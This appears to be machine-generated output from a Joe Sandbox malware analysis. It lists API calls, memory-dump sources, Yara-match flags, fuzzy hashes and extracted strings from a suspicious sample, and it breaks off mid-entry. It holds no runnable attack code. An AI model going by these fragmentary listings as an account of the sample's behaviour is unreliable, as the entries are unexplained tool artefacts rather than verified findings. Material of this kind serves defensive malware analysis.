                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$AllocateHeap
                                                              • String ID:
                                                              • API String ID: 3033488037-0
                                                              • Opcode ID: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                              • Instruction ID: b09f1d80b9d524519e6a2af905cbdca403bfb98ecb25127e3a5e28922fcd0f4f
                                                              • Opcode Fuzzy Hash: 796391581251b77269079763240f90f867541923407a82df9009afead37a043d
                                                              • Instruction Fuzzy Hash: CA51A272A04308AFDB21DF2ADC81BEA77F5EF44714B14056EE805D7291E739DD818B98
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217400A
                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 02174056
                                                              • __Getctype.LIBCPMT ref: 0217406F
                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0217408B
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 02174120
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                              • String ID:
                                                              • API String ID: 1840309910-0
                                                              • Opcode ID: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction ID: 36709380e4d12ebd34b8bb1bc6232389f0bf2624df336492ff8715299c53ff6f
                                                              • Opcode Fuzzy Hash: 66323f1d793a72052a811f518f6dd944a9322236d7f2dab7bac132f41dc380e4
                                                              • Instruction Fuzzy Hash: 4D5153B1D402489FDF10DFE4D8447DEBBB8AF54714F14416AD819AB240EB75EA08CBA1
                                                              APIs
                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 02172C4F
                                                              • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 02172C64
                                                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 02172C72
                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 02172C8D
                                                              • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 02172CAC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                                                              • String ID:
                                                              • API String ID: 2509773233-0
                                                              • Opcode ID: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                              • Instruction ID: 1e0943c1e1a058aaeb2de35cc7342a56673f5afe7d55ed5c7c1a3290ecdfc3a3
                                                              • Opcode Fuzzy Hash: 8ff13bd64c836a37172eabe9342752174e9479ef80da464201f40468a1b6010f
                                                              • Instruction Fuzzy Hash: 6A313771B01008AFDB249F68CC40F6DB7B9EF88700F5541ADED05DB251CB31A906CB94
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                              • String ID:
                                                              • API String ID: 3136044242-0
                                                              • Opcode ID: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                              • Instruction ID: 86b98bd5048e9daedf5606c3f96c4c2c05ee8e367bee4de8e4e1682ebb6c2564
                                                              • Opcode Fuzzy Hash: c90a93295f6bc331d57bb8f47297671563acdadf013a8df03a89f4d1d37c88ce
                                                              • Instruction Fuzzy Hash: EA21A476E0526AAFFB32CF55CC41ABF3AA9EB85AD0F014115FC4867258CB309D419BD1
                                                              APIs
                                                              • _free.LIBCMT ref: 0218FE59
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 0218FE6B
                                                              • _free.LIBCMT ref: 0218FE7D
                                                              • _free.LIBCMT ref: 0218FE8F
                                                              • _free.LIBCMT ref: 0218FEA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                              • Instruction ID: 8d836d885f9cd50bd4cabe10a48626c2766be2602c930e09ab5a3e194e495163
                                                              • Opcode Fuzzy Hash: 833792b777c6c03e8cf0aa346d63d203dbff7c932eedd85bdc8b2f7842ed42dd
                                                              • Instruction Fuzzy Hash: 43F01273944205AFCA25FF64F4C5C2A73DAAB04B247A51815F48CD7B11C734F8818E64
                                                              APIs
                                                              • _free.LIBCMT ref: 0041FBF2
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0041FC04
                                                              • _free.LIBCMT ref: 0041FC16
                                                              • _free.LIBCMT ref: 0041FC28
                                                              • _free.LIBCMT ref: 0041FC3A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                              • Instruction ID: 1c7e9378ca95dd73cb2f75351d3b74d040f08b2e1626f4982a7efc7f0f8a2d9c
                                                              • Opcode Fuzzy Hash: f71149921f413fa43df794f6df76e54a2fab879d3f4956e12af54e0adfca1412
                                                              • Instruction Fuzzy Hash: 30F06873649108A78624DB55E585CCB73DDBB04310354081BF488D7701C738FCC19AAC
                                                              APIs
                                                                • Part of subcall function 0217D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D37E
                                                                • Part of subcall function 0217D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D3BB
                                                              • __Init_thread_footer.LIBCMT ref: 02175FC2
                                                                • Part of subcall function 0217D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0217D333
                                                                • Part of subcall function 0217D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0217D366
                                                              • Sleep.KERNEL32(000007D0), ref: 02176340
                                                              • Sleep.KERNEL32(000007D0), ref: 0217635A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$EnterLeaveSleep$Init_thread_footer
                                                              • String ID: updateSW
                                                              • API String ID: 500923978-2484434887
                                                              • Opcode ID: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                              • Instruction ID: 1a0750623637d378ec64a15f815363ec286c2ecffdb9a5da83e287f6f6ee9470
                                                              • Opcode Fuzzy Hash: bd253d3c5d198e889332913f0522b8ddf46f9631c779f21dd1867174954e9587
                                                              • Instruction Fuzzy Hash: EDD13671A401948FDF28DB24CC887ADBB76AFC5304F1441E9D819AB295DB359EC0CF91
                                                              APIs
                                                                • Part of subcall function 021743B7: ___std_exception_copy.LIBVCRUNTIME ref: 02174446
                                                              • std::locale::_Init.LIBCPMT ref: 0217A335
                                                                • Part of subcall function 0217C77D: std::_Lockit::_Lockit.LIBCPMT ref: 0217C78F
                                                                • Part of subcall function 0217C77D: std::locale::_Setgloballocale.LIBCPMT ref: 0217C7AA
                                                                • Part of subcall function 0217C77D: _Yarn.LIBCPMT ref: 0217C7C0
                                                                • Part of subcall function 0217C77D: std::_Lockit::~_Lockit.LIBCPMT ref: 0217C800
                                                                • Part of subcall function 0217AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0217AE7D
                                                                • Part of subcall function 0217AE47: std::_Lockit::_Lockit.LIBCPMT ref: 0217AEA0
                                                                • Part of subcall function 0217AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0217AEC0
                                                                • Part of subcall function 0217AE47: std::_Lockit::~_Lockit.LIBCPMT ref: 0217AF3A
                                                              • std::locale::_Init.LIBCPMT ref: 0217A3F8
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0217A50F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Init$Concurrency::cancel_current_taskSetgloballocaleYarn___std_exception_copy
                                                              • String ID: X:C
                                                              • API String ID: 569503877-1469212745
                                                              • Opcode ID: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                              • Instruction ID: a8b2bd6022ed7d597394bdfb6ffa9891f386abd577c1c5c2d3f79db6be564029
                                                              • Opcode Fuzzy Hash: 217f668ab1de721d73fda48ba94b0dbc39f4964a2ce04ccc1313e00a63b23f01
                                                              • Instruction Fuzzy Hash: 58A134B0A00205DFDB00CF54C498B9ABBF5FF49314F1582A9D8099F791D7BAAA48CF90
                                                              APIs
                                                                • Part of subcall function 0218ECE0: GetOEMCP.KERNEL32(00000000,0218EF51,00000000,00000000,0218933A,0218933A,00000000,004280A0,00000000), ref: 0218ED0B
                                                              • _free.LIBCMT ref: 0218EFAE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free
                                                              • String ID: 0uC$xX}
                                                              • API String ID: 269201875-1490493339
                                                              • Opcode ID: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                              • Instruction ID: a30cf60cda408100a1b2c1be2f87c2da84ab97c848bf4c9e2b6aca2318933d50
                                                              • Opcode Fuzzy Hash: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                              • Instruction Fuzzy Hash: 9E319E72944209AFDB11EF68D8C0A9E77B6FF44324F15406AF9119B2A0EB329951CF50
                                                              APIs
                                                              • __alloca_probe_16.LIBCMT ref: 0041BE7F
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 0041BEDC
                                                              • __freea.LIBCMT ref: 0041BEE5
                                                                • Part of subcall function 0041A395: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040E15B,?,?,?,004010DD,?,00403497,?,?,?), ref: 0041A3C7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeapStringType__alloca_probe_16__freea
                                                              • String ID: uA
                                                              • API String ID: 2035984020-3888042258
                                                              • Opcode ID: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                              • Instruction ID: 8ad0d2bb7cf9ccb20e4a1086eca39ddb9b037eee8af06865313e927ef5ed8ba2
                                                              • Opcode Fuzzy Hash: 7155a43ec1d6933e7fe47e47275e285a3df6f51680ee3be0c486694057325eca
                                                              • Instruction Fuzzy Hash: E631AF7290021AABDB219F65CC41EEF7BB9EF84714F05412AFD14A7291D7388D91CBE8
                                                              APIs
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 02174446
                                                                • Part of subcall function 0217E5FA: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,02171344,?,0217C52C,?,00435218,?,?,?,?,02171344,00438E00,00438E01), ref: 0217E65A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExceptionRaise___std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3109751735-1866435925
                                                              APIs
                                                              • ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                                • Part of subcall function 0040E393: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,004010DD,?,0040C2C5,?,00435218,?,?,?,?,004010DD,00438E00,00438E01), ref: 0040E3F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ExceptionRaise___std_exception_copy
                                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                              • API String ID: 3109751735-1866435925
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,0218A48E,?,00435740,0000000C,0218A540,?,?,?), ref: 0218A5B6
                                                              • GetLastError.KERNEL32(?,0218A48E,?,00435740,0000000C,0218A540,?,?,?), ref: 0218A5C0
                                                              • __dosmaperr.LIBCMT ref: 0218A5EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID: pJ}
                                                              • API String ID: 2583163307-2408717132
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,0041A227,?,00435740,0000000C,0041A2D9,?,?,?), ref: 0041A34F
                                                              • GetLastError.KERNEL32(?,0041A227,?,00435740,0000000C,0041A2D9,?,?,?), ref: 0041A359
                                                              • __dosmaperr.LIBCMT ref: 0041A384
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                              • String ID: pJ}
                                                              • API String ID: 2583163307-2408717132
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _strrchr
                                                              • String ID:
                                                              • API String ID: 3213747228-0
                                                              APIs
                                                              • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 02171B2C
                                                              • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 02171B4B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileInternet$PointerRead
                                                              • String ID:
                                                              • API String ID: 3197321146-0
                                                              APIs
                                                                • Part of subcall function 00404150: ___std_exception_copy.LIBVCRUNTIME ref: 004041DF
                                                              • std::locale::_Init.LIBCPMT ref: 0040A0CE
                                                                • Part of subcall function 0040C516: std::_Lockit::_Lockit.LIBCPMT ref: 0040C528
                                                                • Part of subcall function 0040C516: std::locale::_Setgloballocale.LIBCPMT ref: 0040C543
                                                                • Part of subcall function 0040C516: _Yarn.LIBCPMT ref: 0040C559
                                                                • Part of subcall function 0040C516: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C599
                                                                • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                                • Part of subcall function 0040ABE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                                • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                                • Part of subcall function 0040ABE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                              • std::locale::_Init.LIBCPMT ref: 0040A191
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2A8
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040A2AD
                                                                • Part of subcall function 004015C0: ___std_exception_copy.LIBVCRUNTIME ref: 004015FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Lockitstd::_$Lockit::_Lockit::~_std::locale::_$Concurrency::cancel_current_taskInit___std_exception_copy$SetgloballocaleYarn
                                                              • String ID:
                                                              • API String ID: 3444572950-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1740715915-0
                                                              APIs
                                                                • Part of subcall function 0218644F: _free.LIBCMT ref: 0218645D
                                                                • Part of subcall function 0218B7F5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,02192E56,0000FDE9,00000000,?,?,?,02192BCF,0000FDE9,00000000,?), ref: 0218B8A1
                                                              • GetLastError.KERNEL32 ref: 0218E43E
                                                              • __dosmaperr.LIBCMT ref: 0218E445
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0218E484
                                                              • __dosmaperr.LIBCMT ref: 0218E48B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                              • String ID:
                                                              • API String ID: 167067550-0
                                                              APIs
                                                                • Part of subcall function 004161E8: _free.LIBCMT ref: 004161F6
                                                                • Part of subcall function 0041B58E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0041BAF6,?,00000000,00000000), ref: 0041B63A
                                                              • GetLastError.KERNEL32 ref: 0041E1D7
                                                              • __dosmaperr.LIBCMT ref: 0041E1DE
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041E21D
                                                              • __dosmaperr.LIBCMT ref: 0041E224
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                              • String ID:
                                                              • API String ID: 167067550-0
                                                              APIs
                                                                • Part of subcall function 10008DC4: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000B163,?,00000000,00000000), ref: 10008E70
                                                              • GetLastError.KERNEL32 ref: 10007C36
                                                              • __dosmaperr.LIBCMT ref: 10007C3D
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10007C7C
                                                              • __dosmaperr.LIBCMT ref: 10007C83
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 1913693674-0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              APIs
                                                              • GetLastError.KERNEL32(021720FF,?,02172103,021816D8,?,021720FF,004280A0,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218908F
                                                              • _free.LIBCMT ref: 021890EC
                                                              • _free.LIBCMT ref: 02189122
                                                              • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0218933A,00000000,004280A0,00000000,00000000,021720FF), ref: 0218912D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                              • Instruction ID: 3f41b249e87afbf55425bc6538e2c7050623dc494b2b3c943986e2f737a75503
                                                              • Opcode Fuzzy Hash: 3ed6f2ded7a2700062d3b3421f2a383b3c8afcfe95e6ce1d9bee78e28f59b4db
                                                              • Instruction Fuzzy Hash: 3A11E5B33C86057FCB213A78ACC4E7B265F9BC1379B250238FA24963D0DF6588059D14
                                                              APIs
                                                              • GetLastError.KERNEL32(00401E98,?,00401E9C,00411471,?,00401E98,74DEDF80,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418E28
                                                              • _free.LIBCMT ref: 00418E85
                                                              • _free.LIBCMT ref: 00418EBB
                                                              • SetLastError.KERNEL32(00000000,00000008,000000FF,?,004190D3,00000000,74DEDF80,00000000,00000000,00401E98), ref: 00418EC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_free
                                                              • String ID:
                                                              • API String ID: 2283115069-0
                                                              • Opcode ID: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                              • Instruction ID: 0e464f2806eaeac5f9ced7654bcd696cc8e1c911a26352911ac68216619f9860
                                                              • Opcode Fuzzy Hash: 35dc7ff6f55437eeeeb352e0fc4fc1d9e7ee3fa865eb4c34cbbeba1caba4d7a2
                                                              • Instruction Fuzzy Hash: 8311E0723097057ACF212A76AC95EEB22599BC17A8B25063FF125C22E1DE6D8CC6512C
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,0218166D,0218A63F,?,?,0217E3C2,?,?,?,02171344,?,021736FE,?,?), ref: 021891E6
                                                              • _free.LIBCMT ref: 02189243
                                                              • _free.LIBCMT ref: 02189279
                                                              • SetLastError.KERNEL32(00000000,00437188,000000FF,?,0217E3C2,?,?,?,02171344,?,021736FE,?,?,?), ref: 02189284
                                                              Memory Dump Source
